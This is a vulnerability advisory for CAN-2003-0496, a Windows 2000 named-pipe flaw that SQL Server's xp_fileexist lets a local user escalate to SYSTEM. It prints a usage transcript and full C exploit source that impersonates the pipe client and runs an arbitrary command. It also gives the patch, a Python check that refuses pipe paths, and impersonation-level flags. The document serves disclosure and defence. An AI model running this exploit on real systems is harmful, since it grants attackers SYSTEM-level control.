Microsoft Windows CreateFile API named pipe privilege escalation vulnerability

Posted on 2005-10-09 13:47
Published: 2003-07-08
Updated: 2003-07-15
Severity: High
Threat: local administrator privileges
Error type: design error
Exploitation: server mode

BUGTRAQ ID: 8128
CVE(CAN) ID: CAN-2003-0496

Affected systems
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
Microsoft Windows 2000 Terminal Services SP3
   +Microsoft Windows 2000 Advanced Server SP3
   +Microsoft Windows 2000 Datacenter Server SP3
   +Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Terminal Services SP2
   +Microsoft Windows 2000 Advanced Server SP2
   +Microsoft Windows 2000 Datacenter Server SP2
   +Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Terminal Services SP1
   +Microsoft Windows 2000 Advanced Server SP1
   +Microsoft Windows 2000 Datacenter Server SP1
   +Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Terminal Services
   +Microsoft Windows 2000 Advanced Server
   +Microsoft Windows 2000 Datacenter Server
   +Microsoft Windows 2000 Server

Unaffected systems
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Terminal Services SP4
   +Microsoft Windows 2000 Advanced Server SP4
   +Microsoft Windows 2000 Datacenter Server SP4
   +Microsoft Windows 2000 Server SP4

Detailed description
Microsoft Windows does not correctly handle named pipes established through the CreateFile API: when such a named pipe is passed as the argument to SQL Server's xp_fileexist stored procedure, an attacker can execute arbitrary commands with the privileges of the SQL Server process.

Test code
C:\>mssqlpipe.exe cmd.exe
Creating pipe: \\.\Pipe\atstake
Pipe created, waiting for connectection
Connect to the database (with isql for example) and execute:
xp_fileexist '\\SERVERNAME\pipe\atstake\'

Then in command shell #2:

C:\>isql -U andreas
Password:
1> xp_fileexist '\\TEMP123\pipe\atstake\'
2> go
File Exists File is a Directory Parent Directory Exists
----------- ------------------- -----------------------
1 0 1

Then, back in command shell #1:

Impersonate user successful, we are running as user: SYSTEM

/*  tac0tac0.c - pay no attention to the name, long story...
 *
 *  Author:  Maceo
 *  Modified to take advantage of CAN-2003-0496 Named Pipe Filename
 *  Local Privilege Escalation Found by @stake. Use with their Advisory.
 *  -wirepair@sh0dan.org http://sh0dan.org
 *
 *  All credits for code go to Maceo, i really did minimal work
 *  with his code, it took me like 3 seconds heh.
 *  Shouts to #innercircle,
 */

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

int main(int argc, char **argv)
{
   DWORD dwNumber = 0;
   DWORD dwType = REG_DWORD;
   DWORD dwSize = sizeof(DWORD);

   if (argc != 2) {
      fprintf(stderr, "Usage: %s <cmd.exe>\nNamed Pipe Local Priv Escalation found by @stake.\n"
                      "This code is to be used with MS-SQL exactly as outlined in their advisory\n"
                      "All credit for this code goes to Maceo, he did a fine job.. -wire\n", argv[0]);
      exit(1);
   }

   // build the named pipe name (the commented-out form targets the SCM control pipe) //
   char szPipe[64];
   //sprintf(szPipe, "\\\\.\\pipe\\net\\NtControlPipe%lu", ++dwNumber);
   sprintf(szPipe, "\\\\.\\pipe\\poop");

   // create the server end of the named pipe before anyone else can //
   HANDLE hPipe = 0;
   hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX,
                            PIPE_TYPE_MESSAGE|PIPE_WAIT,
                            2, 0, 0, 0, NULL);
   if (hPipe == INVALID_HANDLE_VALUE)
   {
     printf ("Failed to create named pipe:\n  %s\n", szPipe);
     return 3;
   }

   // block until a client (SQL Server, via xp_fileexist) opens the pipe with CreateFile //
   ConnectNamedPipe (hPipe, NULL);

   // assume the identity of the client //
   if (!ImpersonateNamedPipeClient (hPipe))
   {
     printf ("Failed to impersonate the named pipe.\n");
     CloseHandle(hPipe);
     return 5;
   }

   // display the impersonated user's name //
   dwSize  = 256;
   char szUser[256];
   GetUserName(szUser, &dwSize);
   printf ("Impersonating: %s\n", szUser);

   system(argv[1]);
   CloseHandle(hPipe);
   return 0;
}

Solution
The vendor has fixed this vulnerability in the latest service pack:

Microsoft Windows 2000 Server SP3:
      Microsoft Upgrade Windows 2000 SP4
      http://www.microsoft.com/windows ... cks/sp4/default.asp

Related information
Named Pipe Filename Local Privilege Escalation
http://www.atstake.com/research/advisories/2003/a070803-1.txt
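The root cause described above is a privileged service (SQL Server, through xp_fileexist) opening a caller-supplied path with CreateFile, which connects to a named pipe the caller controls and lets that pipe's server impersonate the service. As an added example, not part of the advisory and not @stake's or the forum poster's code, here is the input check a privileged file-existence probe could apply before opening the path: it recognises the pipe namespace in the UNC spelling the advisory uses as well as the local device, forward-slash and \\?\ spellings, and refuses them. The sample paths are constructed, and `probe_file_exists` with its injectable `exists` parameter is a hypothetical wrapper.

```python
import os
import re

# Constructed sample arguments, modelled on the advisory's xp_fileexist calls plus
# other spellings Win32 accepts for the same pipe (example data, not from the advisory).
# A Python raw string cannot end in a backslash, so the trailing-backslash form is escaped.
SAMPLES = {
    "\\\\SERVERNAME\\pipe\\atstake\\": True,   # UNC form used in the advisory
    r"\\.\pipe\atstake": True,                 # local device-namespace form
    r"//./pipe/atstake": True,                 # Win32 also accepts forward slashes
    r"\\?\pipe\atstake": True,                 # \\?\ prefix (no path normalisation)
    r"\\?\UNC\host\PIPE\atstake": True,        # \\?\UNC\ spelling of a remote pipe
    r"C:\Temp\report.txt": False,
    r"\\fileserver\share\doc.txt": False,      # ordinary file share, not the pipe share
    r"C:\pipe\notapipe.txt": False,            # 'pipe' as a plain directory name
}

def is_pipe_path(path):
    """True if `path` names a Win32 named pipe in any of the common spellings."""
    p = path.strip().replace("/", "\\")
    # Device/object-namespace prefixes \\.\ and \\?\ bypass normal file-system parsing.
    m = re.match(r"^\\\\[.?]\\(.*)$", p, re.IGNORECASE)
    if m:
        rest = m.group(1)
        unc = re.match(r"^UNC\\(.*)$", rest, re.IGNORECASE)
        if unc:
            p = "\\\\" + unc.group(1)   # \\?\UNC\host\x -> \\host\x, checked below
        else:
            return re.match(r"^pipe(\\|$)", rest, re.IGNORECASE) is not None
    # UNC form \\host\pipe\name: the 'pipe' share is the named-pipe namespace of that host.
    return re.match(r"^\\\\[^\\]+\\pipe(\\|$)", p, re.IGNORECASE) is not None

def probe_file_exists(path, exists=os.path.exists):
    """Hypothetical wrapper for a privileged file-existence probe: refuse pipe paths
    before opening anything; `exists` is injectable so the check runs offline."""
    if is_pipe_path(path):
        raise ValueError("refusing to open a named-pipe path on behalf of the caller: %r" % path)
    return exists(path)

if __name__ == "__main__":
    for sample, expected in SAMPLES.items():
        print("%-32s pipe=%-5s expected=%s" % (sample, is_pipe_path(sample), expected))
```

On Windows the complementary API-level control is to pass SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION (or SECURITY_ANONYMOUS) in CreateFile's dwFlagsAndAttributes, which caps how far a pipe server may impersonate the caller even if a pipe path slips through.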